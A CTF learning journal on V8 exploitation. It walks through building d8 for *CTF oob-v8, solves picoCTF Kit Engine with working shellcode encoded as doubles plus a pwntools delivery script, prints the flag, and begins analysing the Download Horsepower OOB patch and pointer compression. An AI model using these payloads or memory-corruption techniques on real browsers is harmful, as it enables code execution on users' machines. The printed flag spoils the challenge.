Browser Exploitation

This is going to document my journey into V8 exploitation, and hopefully provide some tools to help you learn too.

To start with, we're going to go through *CTF's OOB-V8 challenge, mostly following Faith's brilliantly in-depth writeup. From there, well, we'll see.

Saelo's classic V8 paper is also a goldmine.

*CTF 2019 - oob-v8

Setting Up

Most of what is written from here is courtesy of Faith and their writeup. Please go check it out!

Ok so first off, we're gonna need an old VM. Why? It's an old challenge with an old version of v8. Back then, the v8 build steps required the python command to point at python2 rather than python3 (which is what it points at on my ParrotOS VM), and there are a number of other odd steps. Long story short, there is a very real possibility of needing to jerry-rig a bunch of stuff, and I don't want to break a VM I actually use.

So, we're gonna use a . You can get the ISO file directly from (amd64 version), and then set up a VM in VMware Workstation or your preferred virtualisation program.

Now we want to set up the system we're actually attacking. Instead of building v8 itself, we're going to build d8, the REPL (read–eval–print loop) for v8. It's essentially the command-line of v8, meaning we can compile less.

First off, install useful stuff.

Now let's grab the depot_tools, which is needed for building v8, then add it to our PATH:

Restart the terminal for PATH to update. Then, in a folder of your choice (I am in ~/Desktop/oob-v8), we fetch v8 and install all the dependencies needed to build it:

The next step is to checkout the commit that the challenge is based on, then sync the local files to that:

Now we want to apply the diff file we get given. The challenge archive can be found , and we'll extract it. The oob.diff file defines the changes made to the source code since the commit we checked out, which includes the vulnerability.

Now let's apply it then prepare and build the release version:

But there is a small problem when it gets run:

Now that we have Python 3.8 installed in /usr/bin/python3.8, we can try to overwrite the symlink /usr/bin/python3 to point there instead of the default 3.6.9 version that came with the ISO.

Now we hope and pray that rerunning the ninja command breaks nothing:

Then run it again:

And it starts working! The output release version is found in v8/out.gn/x64.release/d8. Now let's build debug.

And it's done. Epic!

I'm going to revert default Python to version 3.6 to minimise the possibility of something breaking.

Now we can move on to the challenge itself.

picoCTF 2021 - Kit Engine

A lesson in floating-point form

You will need an account for picoCTF to play this. The accounts are free, and there are hundreds of challenges for all categories - highly recommend it!

Analysis

We are given d8, source.tar.gz and server.py. Let's look at server.py first:

#!/usr/bin/env python3 

# With credit/inspiration to the v8 problem in downUnder CTF 2020

import os
import subprocess
import sys
import tempfile

def p(a):
    print(a, flush=True)

MAX_SIZE = 20000
input_size = int(input("Provide size. Must be < 5k:"))
if input_size >= MAX_SIZE:
    p(f"Received size of {input_size}, which is too big")
    sys.exit(-1)
p(f"Provide script please!!")
script_contents = sys.stdin.read(input_size)
p(script_contents)
# Don't buffer
with tempfile.NamedTemporaryFile(buffering=0) as f:
    f.write(script_contents.encode("utf-8"))
    p("File written. Running. Timeout is 20s")
    res = subprocess.run(["./d8", f.name], timeout=20, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    p("Run Complete")
    p(f"Stdout {res.stdout}")
    p(f"Stderr {res.stderr}")

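It's very simple - you input the size of the file, and then you input the file itself. The file contents get written to a temporary JavaScript file, which is then run under ./d8 with stdout and stderr returned to us. Note that although the prompt says the size must be under 5k, the check is actually against MAX_SIZE = 20000. Let's check the source code.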

$ 7z x source.tar.gz
$ tar -xvf source.tar

The patch is as follows:

diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index e6fb20d152..35195b9261 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -979,6 +979,53 @@ struct ModuleResolutionData {
 
 }  // namespace
 
+uint64_t doubleToUint64_t(double d){
+  union {
+    double d;
+    uint64_t u;
+  } conv = { .d = d };
+  return conv.u;
+}
+
+void Shell::Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args) {
+  __asm__("int3");
+}
+
+void Shell::AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args) {
+  Isolate* isolate = args.GetIsolate();
+  if(args.Length() != 1) {
+    return;
+  }
+
+  double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+  if (func == (double *)-1) {
+    printf("Unable to allocate memory. Contact admin\n");
+    return;
+  }
+
+  if (args[0]->IsArray()) {
+    Local<Array> arr = args[0].As<Array>();
+
+    Local<Value> element;
+    for (uint32_t i = 0; i < arr->Length(); i++) {
+      if (arr->Get(isolate->GetCurrentContext(), i).ToLocal(&element) && element->IsNumber()) {
+        Local<Number> val = element.As<Number>();
+        func[i] = val->Value();
+      }
+    }
+
+    printf("Memory Dump. Watch your endianness!!:\n");
+    for (uint32_t i = 0; i < arr->Length(); i++) {
+      printf("%d: float %f hex %lx\n", i, func[i], doubleToUint64_t(func[i]));
+    }
+
+    printf("Starting your engine!!\n");
+    void (*foo)() = (void(*)())func;
+    foo();
+  }
+  printf("Done\n");
+}
+
 void Shell::ModuleResolutionSuccessCallback(
     const FunctionCallbackInfo<Value>& info) {
   std::unique_ptr<ModuleResolutionData> module_resolution_data(
@@ -2201,40 +2248,15 @@ Local<String> Shell::Stringify(Isolate* isolate, Local<Value> value) {
 
 Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
   Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
-  global_template->Set(Symbol::GetToStringTag(isolate),
-                       String::NewFromUtf8Literal(isolate, "global"));
+  // Add challenge builtin, and remove some unintented solutions
+  global_template->Set(isolate, "AssembleEngine", FunctionTemplate::New(isolate, AssembleEngine));
+  global_template->Set(isolate, "Breakpoint", FunctionTemplate::New(isolate, Breakpoint));
   global_template->Set(isolate, "version",
                        FunctionTemplate::New(isolate, Version));
-
   global_template->Set(isolate, "print", FunctionTemplate::New(isolate, Print));
-  global_template->Set(isolate, "printErr",
-                       FunctionTemplate::New(isolate, PrintErr));
-  global_template->Set(isolate, "write", FunctionTemplate::New(isolate, Write));
-  global_template->Set(isolate, "read", FunctionTemplate::New(isolate, Read));
-  global_template->Set(isolate, "readbuffer",
-                       FunctionTemplate::New(isolate, ReadBuffer));
-  global_template->Set(isolate, "readline",
-                       FunctionTemplate::New(isolate, ReadLine));
-  global_template->Set(isolate, "load", FunctionTemplate::New(isolate, Load));
-  global_template->Set(isolate, "setTimeout",
-                       FunctionTemplate::New(isolate, SetTimeout));
-  // Some Emscripten-generated code tries to call 'quit', which in turn would
-  // call C's exit(). This would lead to memory leaks, because there is no way
-  // we can terminate cleanly then, so we need a way to hide 'quit'.
   if (!options.omit_quit) {
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
   }
-  global_template->Set(isolate, "testRunner",
-                       Shell::CreateTestRunnerTemplate(isolate));
-  global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
-  global_template->Set(isolate, "performance",
-                       Shell::CreatePerformanceTemplate(isolate));
-  global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
-  // Prevent fuzzers from creating side effects.
-  if (!i::FLAG_fuzzing) {
-    global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
-  }
-  global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
 
 #ifdef V8_FUZZILLI
   global_template->Set(
@@ -2243,11 +2265,6 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
       FunctionTemplate::New(isolate, Fuzzilli), PropertyAttribute::DontEnum);
 #endif  // V8_FUZZILLI
 
-  if (i::FLAG_expose_async_hooks) {
-    global_template->Set(isolate, "async_hooks",
-                         Shell::CreateAsyncHookTemplate(isolate));
-  }
-
   return global_template;
 }
 
@@ -2449,10 +2466,10 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
             v8::Isolate::kMessageLog);
   }
 
-  isolate->SetHostImportModuleDynamicallyCallback(
+  /*isolate->SetHostImportModuleDynamicallyCallback(
       Shell::HostImportModuleDynamically);
   isolate->SetHostInitializeImportMetaObjectCallback(
-      Shell::HostInitializeImportMetaObject);
+      Shell::HostInitializeImportMetaObject);*/
 
 #ifdef V8_FUZZILLI
   // Let the parent process (Fuzzilli) know we are ready.
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a6a1037cff..4591d27f65 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -413,6 +413,9 @@ class Shell : public i::AllStatic {
     kNoProcessMessageQueue = false
   };
 
+  static void AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args);
+  static void Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args);
+
   static bool ExecuteString(Isolate* isolate, Local<String> source,
                             Local<Value> name, PrintResult print_result,
                             ReportExceptions report_exceptions,

This is just generally quite strange. The only particularly relevant part is the new AssembleEngine() function:

void Shell::AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args) {
    Isolate* isolate = args.GetIsolate();
    if(args.Length() != 1) {
        return;
    }
    
    double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (func == (double *)-1) {
        printf("Unable to allocate memory. Contact admin\n");
        return;
    }
    
    if (args[0]->IsArray()) {
        Local<Array> arr = args[0].As<Array>();
    
        Local<Value> element;
        for (uint32_t i = 0; i < arr->Length(); i++) {
            if (arr->Get(isolate->GetCurrentContext(), i).ToLocal(&element) && element->IsNumber()) {
                Local<Number> val = element.As<Number>();
                func[i] = val->Value();
            }
        }
    
        printf("Memory Dump. Watch your endianness!!:\n");
        for (uint32_t i = 0; i < arr->Length(); i++) {
            printf("%d: float %f hex %lx\n", i, func[i], doubleToUint64_t(func[i]));
        }
        
        printf("Starting your engine!!\n");
        void (*foo)() = (void(*)())func;
        foo();
    }
    printf("Done\n");
}

This is a pretty strange function to have, but the process is simple. First there are a couple of setup steps, and if either fails the function returns early:

Check that the number of arguments is exactly 1
Allocate 4096 bytes of memory with RWX permissions

Then, if the first argument is an array, we cast it to one and store it in arr. We then loop through arr, and for every index i, we store the item at that index in the local variable element. If it's a number, it gets written to func[i]. Essentially, it copies the entirety of arr to func, with some added checks to make sure the types are correct.

There is then a memory dump of func, just to simplify things.

And then finally execution is continued from func, like a classic shellcoding challenge!
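
To make the copy loop a bit more concrete, here's a rough Python model of it. This is only a sketch: assemble() and its bytearray are stand-ins I've made up for AssembleEngine() and the mmap()'d region, and nothing gets executed. The point is that every number lands in memory as an 8-byte little-endian double, and anything that isn't a number leaves its slot untouched (zeroed, since the mapping is anonymous).

```python
import struct

def assemble(values, size=4096):
    """Toy model of the copy loop in AssembleEngine() (hypothetical helper)."""
    func = bytearray(size)  # stands in for the zero-filled RWX region
    for i, v in enumerate(values):
        # mirrors element->IsNumber(): only real numbers are copied
        if isinstance(v, (int, float)) and not isinstance(v, bool):
            struct.pack_into("<d", func, i * 8, float(v))
    # return just the part the memory dump would show
    return bytes(func[:len(values) * 8])

dump = assemble([1.0, "skip me", 2.0])
for i in range(0, len(dump), 8):
    print(i // 8, dump[i:i + 8].hex())
```

The raw bytes of each double are exactly what the CPU would see once execution jumps to func, which is why the rest of this page is about choosing doubles by their byte pattern rather than their numeric value.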

Exploitation

This isn't really much of a V8-specific challenge - the data we input is run as shellcode, and the output is returned to us.

HOWEVER

val->Value() actually returns a floating-point value (a double), not an integer. Maybe you could get this from the source code, but you could also get it from the mmap() line:

double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

You can see it's all double values. This means we have to inject shellcode, but in its floating-point form rather than as integers.

If you've read the oob-v8 writeup, you know there are common functions for converting the integers you want to be written to memory to the floating-point form that would write them (and if you haven't, check it out).

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}
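
If you'd rather sanity-check the conversion outside of d8, the same reinterpretation can be sketched in Python with the struct module. The names itof and ftoi below just mirror the JavaScript helpers; this is my own equivalent under the assumption of little-endian 64-bit values, not code from the challenge.

```python
import struct

def itof(val: int) -> float:
    """Reinterpret a 64-bit unsigned integer's bits as a double."""
    return struct.unpack("<d", struct.pack("<Q", val))[0]

def ftoi(val: float) -> int:
    """Reinterpret a double's bits as a 64-bit unsigned integer."""
    return struct.unpack("<Q", struct.pack("<d", val))[0]

print(itof(0x3ff0000000000000))  # bit pattern of 1.0
print(hex(ftoi(2.0)))
```

No arithmetic conversion happens here: the eight bytes stay the same and only the type used to read them changes, which is the same trick the shared ArrayBuffer pulls off in JavaScript.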

So now we just need to get valid shellcode, convert it into 64-bit integers and find the float equivalent. Once we make the array, we simply call AssembleEngine() on it and it executes it for us. Easy peasy!

We can't actually interact with the process, only get stdout and stderr, so we'll have to go to a direct read of flag.txt. We can use pwntools to generate the shellcode for this:

from pwn import *

context.os = 'linux'
context.arch = 'amd64'

shellcode = asm(shellcraft.cat('flag.txt'))

shellcode is already a bytes object, so we want to split it into 8-byte chunks and turn each chunk into a 64-bit integer that we can then transform into a float. Additionally, the 64-bit integers have to have the bytes in reverse order for endianness! We'll let python do all of that for us:

from pwn import *

# set all the context
context.os = 'linux'
context.arch = 'amd64'

# create the shellcode
shellcode = asm(shellcraft.cat('flag.txt'))
print(shellcode)
# pad it to a multiple of 8 with NOP instructions
# this means the conversion to 8-byte values is smoother
# (computed rather than hardcoded; it was 4 bytes for this shellcode)
shellcode += b'\x90' * (-len(shellcode) % 8)

# get the hex codes for every byte and store them as strings in a list
hex_bytes = [hex(c)[2:].rjust(2, '0') for c in shellcode]
# get the shellcode bytes in packs of 8, in reverse order for endianness, with 0x at the front
eight_bytes = ['0x' + ''.join(hex_bytes[i:i+8][::-1]) for i in range(0, len(hex_bytes), 8)]
print(eight_bytes)

We can dump this (after minor cleanup) into exploit.js and convert the entire list to floats before calling AssembleEngine(). Make sure you put the n after every 64-bit value, to tell JavaScript that it's a BigInt!
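
The "minor cleanup" can also be automated. Here's a small sketch that skips the hex-string juggling by using int.from_bytes, then prints an array literal with the n suffix already attached. to_qwords and to_js_array are names I've made up, and the sample bytes are just the first 15 bytes of this writeup's payload read back in memory order, so the NOP padding is visible.

```python
def to_qwords(code: bytes) -> list:
    """Pad with NOPs to a multiple of 8, then read little-endian 64-bit integers."""
    code += b"\x90" * (-len(code) % 8)
    return [int.from_bytes(code[i:i + 8], "little") for i in range(0, len(code), 8)]

def to_js_array(qwords) -> str:
    """Format the integers as a JavaScript array of BigInt literals."""
    return "[" + ", ".join(f"0x{q:016x}n" for q in qwords) + "]"

# sample input: 15 bytes, so one NOP of padding gets added
sample = bytes.fromhex("6a01fe0c2448b866" "6c61672e747874")
print(to_js_array(to_qwords(sample)))
```

In practice you would pass the output of asm(shellcraft.cat('flag.txt')) to to_qwords() and paste the printed array straight into exploit.js.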

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
// despite the name, this is a view of two 32-bit halves over the same 8 bytes
var u64_buf = new Uint32Array(buf);

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// needs to have the `n` to be a BigInt value!
var payload = [0x66b848240cfe016an, 0x507478742e67616cn, 0xf631e7894858026an, 0x7fffffffba41050fn, 0x016a58286ac68948n, 0x90909090050f995fn]
var payload_float = []

for (let i = 0; i < payload.length; i++) {
    payload_float.push(itof(payload[i]))
}

AssembleEngine(payload_float)
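
One extra sanity check that isn't part of the original solve: some 64-bit patterns decode to NaN as a double (all exponent bits set, non-zero mantissa), and as far as I know a JavaScript engine isn't obliged to keep a NaN's exact bits intact. The payload above worked as-is against this challenge, so treat the sketch below purely as a diagnostic for when a different payload misbehaves. is_nan_pattern is a made-up helper name.

```python
def is_nan_pattern(q: int) -> bool:
    """True if the 64-bit pattern q is a NaN when read as an IEEE 754 double."""
    exponent = (q >> 52) & 0x7ff
    mantissa = q & ((1 << 52) - 1)
    return exponent == 0x7ff and mantissa != 0

# the payload values from exploit.js, without the BigInt suffix
payload = [0x66b848240cfe016a, 0x507478742e67616c, 0xf631e7894858026a,
           0x7fffffffba41050f, 0x016a58286ac68948, 0x90909090050f995f]

for i, q in enumerate(payload):
    print(i, hex(q), "NaN pattern" if is_nan_pattern(q) else "ok")
```

If a flagged value ever did get mangled, one option would be to shift the shellcode with a few leading NOPs so the offending bytes fall across a different 8-byte boundary.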

And finally we can deliver it with a python script using pwntools, and parse the output to get the important bit:

from pwn import *

with open("exploit.js", "rb") as f:
    exploit = f.read()

p = remote('mercury.picoctf.net', 48700)
p.sendlineafter(b'5k:', str(len(exploit)).encode())
p.sendlineafter(b'please!!\n', exploit)

p.recvuntil(b"Stdout b'")
flag = p.recvuntil(b"\\")[:-1]
print(flag.decode())
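
The recvuntil() calls work because server.py prints the repr of a bytes object, so the flag is followed by a literal backslash (from the \n at the end). If you've saved the server's response and want to parse it offline, a slightly more robust sketch is to hand that repr to ast.literal_eval. extract_stdout and the sample line are made up for illustration.

```python
import ast

def extract_stdout(line: str) -> bytes:
    """Turn a 'Stdout b'...'' line from server.py back into the raw bytes."""
    prefix = "Stdout "
    if not line.startswith(prefix):
        raise ValueError("not a Stdout line")
    # literal_eval safely parses the b'...' literal, undoing the escaping
    return ast.literal_eval(line[len(prefix):])

# hypothetical sample response line, not a real flag
sample = "Stdout b'picoCTF{example}\\n'"
print(extract_stdout(sample).decode().strip())
```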

And we get the flag:

picoCTF{vr00m_vr00m_48f07b402a4020e0}

picoCTF 2021 - Download Horsepower

Another OOB, but with pointer compression

Analysis

server.py is the same as in Kit Engine - send it a JS file, it gets run.

Let's check the patch again:

diff --git a/BUILD.gn b/BUILD.gn
index 9482b977e3..6a3f1e2d0f 100644
--- a/BUILD.gn
+++ b/BUILD.gn
@@ -1175,6 +1175,7 @@ action("postmortem-metadata") {
 }
 
 torque_files = [
+  "src/builtins/array-horsepower.tq",
   "src/builtins/aggregate-error.tq",
   "src/builtins/array-at.tq",
   "src/builtins/array-copywithin.tq",
diff --git a/src/builtins/array-horsepower.tq b/src/builtins/array-horsepower.tq
new file mode 100644
index 0000000000..7ea53ca306
--- /dev/null
+++ b/src/builtins/array-horsepower.tq
@@ -0,0 +1,17 @@
+// Gotta go fast!!
+
+namespace array {
+
+transitioning javascript builtin
+ArraySetHorsepower(
+  js-implicit context: NativeContext, receiver: JSAny)(horsepower: JSAny): JSAny {
+    try {
+      const h: Smi = Cast<Smi>(horsepower) otherwise End;
+      const a: JSArray = Cast<JSArray>(receiver) otherwise End;
+      a.SetLength(h);
+    } label End {
+        Print("Improper attempt to set horsepower");
+    }
+    return receiver;
+}
+}
\ No newline at end of file
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index e6fb20d152..abfb553864 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -999,6 +999,10 @@ void Shell::ModuleResolutionSuccessCallback(
   resolver->Resolve(realm, module_namespace).ToChecked();
 }
 
+void Shell::Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args) {
+  __asm__("int3");
+}
+
 void Shell::ModuleResolutionFailureCallback(
     const FunctionCallbackInfo<Value>& info) {
   std::unique_ptr<ModuleResolutionData> module_resolution_data(
@@ -2201,40 +2205,14 @@ Local<String> Shell::Stringify(Isolate* isolate, Local<Value> value) {
 
 Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
   Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
-  global_template->Set(Symbol::GetToStringTag(isolate),
-                       String::NewFromUtf8Literal(isolate, "global"));
+  // Remove some unintented solutions
+  global_template->Set(isolate, "Breakpoint", FunctionTemplate::New(isolate, Breakpoint));
   global_template->Set(isolate, "version",
                        FunctionTemplate::New(isolate, Version));
-
   global_template->Set(isolate, "print", FunctionTemplate::New(isolate, Print));
-  global_template->Set(isolate, "printErr",
-                       FunctionTemplate::New(isolate, PrintErr));
-  global_template->Set(isolate, "write", FunctionTemplate::New(isolate, Write));
-  global_template->Set(isolate, "read", FunctionTemplate::New(isolate, Read));
-  global_template->Set(isolate, "readbuffer",
-                       FunctionTemplate::New(isolate, ReadBuffer));
-  global_template->Set(isolate, "readline",
-                       FunctionTemplate::New(isolate, ReadLine));
-  global_template->Set(isolate, "load", FunctionTemplate::New(isolate, Load));
-  global_template->Set(isolate, "setTimeout",
-                       FunctionTemplate::New(isolate, SetTimeout));
-  // Some Emscripten-generated code tries to call 'quit', which in turn would
-  // call C's exit(). This would lead to memory leaks, because there is no way
-  // we can terminate cleanly then, so we need a way to hide 'quit'.
   if (!options.omit_quit) {
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
   }
-  global_template->Set(isolate, "testRunner",
-                       Shell::CreateTestRunnerTemplate(isolate));
-  global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
-  global_template->Set(isolate, "performance",
-                       Shell::CreatePerformanceTemplate(isolate));
-  global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
-  // Prevent fuzzers from creating side effects.
-  if (!i::FLAG_fuzzing) {
-    global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
-  }
-  global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
 
 #ifdef V8_FUZZILLI
   global_template->Set(
@@ -2243,11 +2221,6 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
       FunctionTemplate::New(isolate, Fuzzilli), PropertyAttribute::DontEnum);
 #endif  // V8_FUZZILLI
 
-  if (i::FLAG_expose_async_hooks) {
-    global_template->Set(isolate, "async_hooks",
-                         Shell::CreateAsyncHookTemplate(isolate));
-  }
-
   return global_template;
 }
 
@@ -2449,10 +2422,10 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
             v8::Isolate::kMessageLog);
   }
 
-  isolate->SetHostImportModuleDynamicallyCallback(
+  /*isolate->SetHostImportModuleDynamicallyCallback(
       Shell::HostImportModuleDynamically);
   isolate->SetHostInitializeImportMetaObjectCallback(
-      Shell::HostInitializeImportMetaObject);
+      Shell::HostInitializeImportMetaObject);*/
 
 #ifdef V8_FUZZILLI
   // Let the parent process (Fuzzilli) know we are ready.
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a6a1037cff..7cf66d285a 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -413,6 +413,8 @@ class Shell : public i::AllStatic {
     kNoProcessMessageQueue = false
   };
 
+  static void Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args);
+
   static bool ExecuteString(Isolate* isolate, Local<String> source,
                             Local<Value> name, PrintResult print_result,
                             ReportExceptions report_exceptions,
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
index ce3886e87e..6621a79618 100644
--- a/src/init/bootstrapper.cc
+++ b/src/init/bootstrapper.cc
@@ -1754,6 +1754,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
     JSObject::AddProperty(isolate_, proto, factory->constructor_string(),
                           array_function, DONT_ENUM);
 
+    SimpleInstallFunction(isolate_, proto, "setHorsepower",
+                          Builtins::kArraySetHorsepower, 1, false);
     SimpleInstallFunction(isolate_, proto, "concat", Builtins::kArrayConcat, 1,
                           false);
     SimpleInstallFunction(isolate_, proto, "copyWithin",
diff --git a/src/objects/js-array.tq b/src/objects/js-array.tq
index b18f5bafac..b466b330cd 100644
--- a/src/objects/js-array.tq
+++ b/src/objects/js-array.tq
@@ -28,6 +28,9 @@ extern class JSArray extends JSObject {
   macro IsEmpty(): bool {
     return this.length == 0;
   }
+  macro SetLength(l: Smi) {
+    this.length = l;
+  }
   length: Number;
 }

The only really relevant code is here:

ArraySetHorsepower(js-implicit context: NativeContext, receiver: JSAny)(horsepower: JSAny): JSAny {
    try {
        const h: Smi = Cast<Smi>(horsepower) otherwise End;
        const a: JSArray = Cast<JSArray>(receiver) otherwise End;
        a.SetLength(h);
    } label End {
        Print("Improper attempt to set horsepower");
    }
    return receiver;
}

macro SetLength(l: Smi) {
    this.length = l;
}

SimpleInstallFunction(isolate_, proto, "setHorsepower",
    Builtins::kArraySetHorsepower, 1, false);

We can essentially set the length of an array by using .setHorsepower(). By setting it to a larger value, we can get an OOB read and write, from which point it would be very similar to the oob-v8 writeup.

Understanding the Memory Layout

Let's first try and check the OOB works as we expected. We're gonna create an exploit.js with the classic ftoi() and itof() functions:

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}
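As a quick sanity check, the two helpers can be run in plain Node.js with no patched d8 needed. The sketch below repeats the definitions so it runs on its own, and assumes a little-endian host (so index 0 of the Uint32Array is the low half). The sample values are the bit patterns of 1.5 and 2.5, which show up in the memory dumps later on.

```javascript
// Shared 8-byte scratch buffer, viewed as one double or as two 32-bit halves.
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf); // despite the name, these are 32-bit halves

function ftoi(val) { // double -> BigInt holding the same 64 bits
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // BigInt -> double holding the same 64 bits
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

console.log(ftoi(1.5).toString(16));    // 3ff8000000000000
console.log(ftoi(2.5).toString(16));    // 4004000000000000
console.log(itof(0x3ff8000000000000n)); // 1.5
```

Both directions only copy bits around, so itof(ftoi(x)) gives back x for any ordinary (non-NaN) double.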

Then load up d8 under GDB. This version is a lot newer than the one from OOB-V8, so let's work out what is what.

$ gdb d8
gef➤  run --allow-natives-syntax --shell exploit.js
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> %DebugPrint(a)
DebugPrint: 0xa5e08085179: [JSArray]
 - map: 0x0a5e082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - prototype: 0x0a5e0820ab61 <JSArray[0]>
 - elements: 0x0a5e08085161 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
 - length: 2
 - properties: 0x0a5e0804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0xa5e080446d1: [String] in ReadOnlySpace: #length: 0x0a5e0818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x0a5e08085161 <FixedDoubleArray[2]> {
           0: 1.5
           1: 2.5
 }
0xa5e082439f1: [Map]
 - type: JS_ARRAY_TYPE
 - instance size: 16
 - inobject properties: 0
 - elements kind: PACKED_DOUBLE_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - back pointer: 0x0a5e082439c9 <Map(HOLEY_SMI_ELEMENTS)>
 - prototype_validity cell: 0x0a5e08182405 <Cell value= 1>
 - instance descriptors #1: 0x0a5e0820b031 <DescriptorArray[1]>
 - transitions #1: 0x0a5e0820b07d <TransitionArray[4]>Transition array #1:
     0x0a5e08044fd5 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x0a5e08243a19 <Map(HOLEY_DOUBLE_ELEMENTS)>

 - prototype: 0x0a5e0820ab61 <JSArray[0]>
 - constructor: 0x0a5e0820a8f1 <JSFunction Array (sfi = 0xa5e0818ac31)>
 - dependent code: 0x0a5e080421b9 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
 - construction counter: 0

[1.5, 2.5]
gef➤  x/10gx 0xa5e08085179-1       <--- -1 needed due to pointer tagging!
0xa5e08085178:	0x0804222d082439f1	0x0000000408085161
0xa5e08085188:	0x58f55236080425a9	0x7566280a00000adc
0xa5e08085198:	0x29286e6f6974636e	0x20657375220a7b20
0xa5e080851a8:	0x3b22746369727473	0x6d2041202f2f0a0a
0xa5e080851b8:	0x76696e752065726f	0x7473206c61737265

Types and their Representation

So, right off the bat there are some differences. For example, look at the first value 0x0804222d082439f1. What on earth is that? Well, if you have eagle eyes or are familiar with a newer V8 feature called pointer compression, you may notice that it lines up with the properties and map pointers:

 - map: 0x0a5e082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - properties: 0x0a5e0804222d <FixedArray[0]>

Notice that the last 4 bytes of each pointer are stored in that value 0x0804222d082439f1 - the upper 4 bytes are the last 4 bytes of the properties pointer, and the lower 4 bytes are the last 4 bytes of the map pointer.

This is a feature added to V8 in 2020 called pointer compression, where the upper 4 bytes of pointers are not stored, as they are the same for every pointer in the heap. Instead, a single base is saved, and only the lower 4 bytes of each pointer are stored. The upper 4 bytes, known as the isolate root, are held in the R13 register. More information can be found in this blog post, but it's made a huge difference to performance. As well as pointers, smis have also changed representation - instead of being 32-bit values left-shifted by 32 bits to differentiate them from pointers, they are now simply doubled (left-shifted by one bit) and therefore also stored in 32-bit space, which leaves 31 bits for the value itself.

A double is stored as its 64-bit binary representation
An smi is a 31-bit number, stored as itself left-shifted by 1 so the bottom bit is 0
- e.g. 0x12345678 is stored as 0x2468acf0
A (compressed) pointer to an address addr is stored as addr | 1, that is, the least significant bit is set to 1.
- e.g. 0x12345678 is stored as 0x12345679
- This helps differentiate it from an smi, but not from a double!
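The tagging rules above can be written down as a few tiny helpers. This is just a sketch in plain JavaScript: the function names are made up for illustration (they are not V8 APIs), values are 32-bit compressed words held as BigInts, and only non-negative smis are handled.

```javascript
// Hypothetical helpers modelling 32-bit compressed values (not V8 APIs).
const MASK32 = 0xffffffffn;

// An smi is stored shifted left by one, leaving the low bit clear.
function encodeSmi(n) { return (BigInt(n) << 1n) & MASK32; }
function decodeSmi(raw) { return raw >> 1n; } // non-negative smis only

// A heap pointer is stored with its low bit set.
function tagPointer(addr) { return addr | 1n; }
function untagPointer(raw) { return raw & ~1n; }

// The low bit tells the two apart.
function isSmi(raw) { return (raw & 1n) === 0n; }

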